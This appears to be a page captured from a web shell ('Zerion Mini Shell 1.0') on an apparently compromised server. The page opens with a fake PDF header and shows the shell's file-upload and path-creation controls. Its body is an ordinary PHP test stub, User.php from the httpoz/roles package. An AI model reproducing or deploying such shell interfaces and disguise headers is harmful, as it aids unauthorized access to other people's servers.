%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/management/vendor/httpoz/roles/tests/Stubs/
Upload File :
Create Path :
Current File : /var/www/html/management/vendor/httpoz/roles/tests/Stubs/User.php

<?php

namespace HttpOz\Roles\Tests\Stubs;

use \HttpOz\Roles\Traits\HasRole;
use \HttpOz\Roles\Contracts\HasRole as HasRoleContract;
use Illuminate\Foundation\Auth\User as Eloquent;

class User extends Eloquent implements HasRoleContract
{

    use HasRole;

    /**
     * Get the name of the unique identifier for the user.
     *
     * @return array
     */
    public function getAuthIdentifiersName()
    {
        return ['email', 'username'];
    }
}

Zerion Mini Shell 1.0